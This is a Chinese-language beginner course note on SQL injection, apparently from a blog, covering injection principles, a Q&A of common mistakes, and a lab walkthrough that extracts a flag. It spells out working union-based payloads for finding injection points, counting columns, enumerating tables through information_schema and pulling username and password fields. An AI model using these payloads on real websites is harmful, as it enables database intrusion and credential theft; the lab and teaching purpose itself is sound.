web安全入门(第四章-1)SQL注入的原理分析
1、SQL注入本质
注入攻击的本质,是把用户输入的数据当作代码执行这有两个条件:
第一个是用户能够控制输入
第二个是原本程序要执行的代码,拼接里用户输入的数据然后执行sql注入就是针对sql语句的注入,也可以理解为用户输入的数据当作sql语句的代码执行了
sql注入是1998年一名叫做rfp的黑客发表的一篇文章让后才进入了大众视线。
2、显错注入靶场的做法
判断注入点
最古老的方法:输入and1=1页面正常输入and1=2页面不正常最简单的方法:页面后面加',看是否报错老师的方法: 如果是数字型传参,可以尝试-1例如: http://www.xxx.com/new/php?id=1 页面显示id=1的新闻http://www.xxx.com/new.php?id=2-1 页面显示id=1的新闻and 1=1 and 1=2 被拦截的可能性太高了可以尝试 and -1=-1 and -1=-2 and 1>0 or 1=1或者直接or sleep(5)
3、分析公开课猫舍注入
显错注入核心-联合查询联合查询[将两个查询语句结果一起输出]条件:两个查询语句的结果集字段数必须相同
select*from news where id=1
union
select password,username from admin limit
union select 1,2 database()
http://59.63.200.79:8003/?id=1 and 1=2 union select1,2information_schema.tables 存放表名和库名的对应
information_schema.columns 存放字段名和表名的对应注: information_schema.tables 实际上是选中information_schema库中的tables表
4、显错注入靶场的做法
MYSQL注入:判断当前页面字段总数and 1=1 order by 1,2,3,4,5……判断显示位and 1=2 union select 1,2,3,4,5,6,7……查当前数据库and 1=2 union select 1,2,database() 查表名and 1=2 union select 1,2,table_name from information_schema.tables where TABLE_SCHEMA=数据库名 limit 0,1查列名and 1=2 Union select 1,2,columns_name from information_schema.COLUMNS where TABLE_NAME=表名 limit 0,1查字段内容and 1=2 union select 1,用户名段,密码段 from 表名 limit 0,1
补充:
SQL注入基础-本课易错回答分析
1.sql注入本质是什么
把用户输入当做代码执行2.sql注入的条件
用户可控输入和原本程序要执行代码,拼接用户输入且当作SQL语句去执行3.order by的作用及含义
order by 用于判断显示位,order by 原有的作用是对字段进行一个排序,在sql注入中用order by 来判断排序,order by 1就是对一个字段进行排序,如果一共四个字段,你order by 5 数据库不知道怎么排序,于是乎就错误了无返回值4.union select如何发挥作用
union为联合查询,a联合b进行了查询,为查询了前面的sql语句(原有的)后再进行后面的sq查询(我们添加的),但两张表联合查询的字段数必须相同。5.输出位是什么
SQL查询出来的数据不一定全部会输出,页面上只会输出几个字段的信息,那几个会输出的字段就是输出位6.information_schema是什么
information_schema是mysql的系统自带表,用于查询数据,在mysql5.0以上版本中存在7.加单引号和加 and 1=2有什么区别
有区别,单引号是为了闭合语句,而and 1=2是为了让union前面的语句无查询结果无输出,然后直接输出拼接进去union后面的那个语句的查询结果8.and 是什么意思
and 为和的意思,一个语句中,当前一个正确,后一个错误时,如果是and连接整个语句返回是False9.or是什么意思
Or 为和的意思,一个语句中,当前一个正确,后一个错误时,如果是or连接整个语句返回是True10.and 和 or 选择使用有什么讲究?And 语句执行时,如果and 前的语句返回False,那么and后面的语句根本不执行11.除了单引号外还有其他的符号可以闭合吗?
实际上还是要看源码,常见的是单引号和双引号还有括号12.limit的作用
limit 在注入中用于排序然后输出,limit a,b a代表了从哪个位置(从0开始) b代表从那位开始显示几条数据13.可以查讯多个字段内容吗
可以,可以使用语句Group_concat()函数进行输出14.%23有什么作用
%23编码为#,用于注释后面的语句,防止SQL注入点后原本的SQL语句对SQL注入进行干扰15.报错注入的原理
利用sql注入拼接sql语句,将报错信息输出时同时将我们想要的信息输出16.闭合是什么
在sql查询中,代码比较严谨,括号和引号都得成双成对,引号内的默认是字符串不会当作SQL语句执行,所以必须闭合然后才能注入,当然有些SQL语句直接拼接,也就不用什么闭合了17.SQL注入有数据库限制吗?
没有,常见的数据库都可以18.SQL注入有动态脚本语言限制吗?
没有限制19.SQL注入如果没系统自带表怎么办
那就惨了,只能通过猜,不断的尝试,一般而言数据库的表也不会乱起名字,毕竟是团队协作的东西20.系统自带库管理员不会修改吗?
一般而言并不会21.union all 和 union 区别
如果输出的数据有相同的,Union只会输出一次,而union all都会输出22.为什么用and 1=1正常 and 1=2报错来判断是否存在SQL注入
因为如果存在SQL注入,那么and就是和的意思,1=1是一个恒等式,然后因为原本能够查出数据,那么两个真就是True,但是1=2肯定是不可能的,这里就会返回一个False,然后因为和必须两个真才返回True,所以这里拼接就不成立返回False.
自己写的过程:
查看是否存在sql注入
使用古老方法 and 1=1页面正常and 1=2页面显示错误,说明存在sql注入查看有几个字段:order by 1order by 2 order by 3order by 4 显示错误,说明有三个字段找输出点:union select 1,2,3结果出现 2,3 说明2,3都可以输出查询系统自带库:union select 1,2,table_name from information_schema.tables where table_schema=database()出现第一个表,在后面加 limit 1,1 获取第二个表查找字段:union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name='error_flag'最后得到字段名 找到字段名获取数据:union select 1,2,flag from error_flag-- '如果数据flag错误 可以试试limit 0,1/1,1
web安全入门(第四章-1)SQL注入的原理分析相关推荐
- sql注入的原理分析
1.知识点一:什么是sql注入? 用户输入的内容被网站当做数据库语句进行执行.关键点:输入的内容 一定要是[数据库语句]. 用户输入的内容: 我们输入的内容. 在一个网站上能够输入的地方: 1 ...
- 数据库系统概念总结:第四章 中级SQL
周末无事水文章,期末备考的总结资料 第四章 中级SQL 4.1 连接表达式 4.1.1 连接条件 select * from student join takes on student.ID = ta ...
- 第十四章 使用SQL Shell界面(三)
文章目录 第十四章 使用SQL Shell界面(三) SQL元数据.查询计划和性能指标 显示元数据 SHOW STATEMENT EXPLAIN and Show Plan SQL Shell Per ...
- 第十四章 使用SQL Shell界面(一)
文章目录 第十四章 使用SQL Shell界面(一) 执行SQL的其他方式 调用SQL Shell GO命令 输入参数 执行ObjectScript命令 浏览命名空间 CALL 命令 执行SQL脚本文 ...
- Hadoop快速入门——第四章、zookeeper安装
Hadoop快速入门--第四章.zookeeper安装 压缩包下载地址:[https://download.csdn.net/download/feng8403000/85227883] 目录 1.上 ...
- 第四章 LTI系统的变换域分析
第四章 LTI系统的变换域分析 系统函数与频域响应 系统函数:将LTI系统的单位脉冲响应h[n]h[n]h[n]的z变换称为系统函数,表示为H(z)=∑n=−∞∞h[n]z−nH(z)=\sum_{n ...
- Sql注入基础原理介绍(超详细)
一.Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一. 二.Web ...
- sql注入基础原理(超详细)
一.Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一. 二.Web ...
- 闷骚型的高级技术员写的SQL注入基础原理(超详细)
一.Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一. 二.Web ...
最新文章
- Ubuntu 12.04安装Sun JDK 6
- java培训面试技巧分享
- python运行程序-一文看懂python程序的执行过程
- java 实体类包含list 怎么取值_舅舅是面试官,偷偷告诉你们面试官最爱问的Java面试题...
- 在Ubuntu上创建并测试GRE tunnel
- 建立任务程序直接执行网页(.net)
- TypeError: Object of type ‘TrackedArray‘ is not JSON serializable
- 概率论符号_考研概率论知识点总结1
- 关于Itext 报错-java.lang.NoClassDefFoundError: org/bouncycastle/asn1/ASN1Encodable
- 2021考研王道计算机408
- 协方差矩阵的计算方法
- 芯片测试需要掌握什么软件,芯片测试工程师岗位职责
- 如何申请Office 365 E5开发者账号,开通OneDrive 5T空间教程
- idea svn IP地址更换方法
- 海量数据下的舆情分析,该如何搭建?
- 哪个软件能实盘测试策略,Quicklib提供期货CTA策略实盘模拟监控的好工具(原创)...
- 苹果Mac系统历年名称和版本号
- R语言——多元线性回归
- python爬贴吧回复_Python爬虫——抓取贴吧帖子
- 如何应对面试中的常见问题?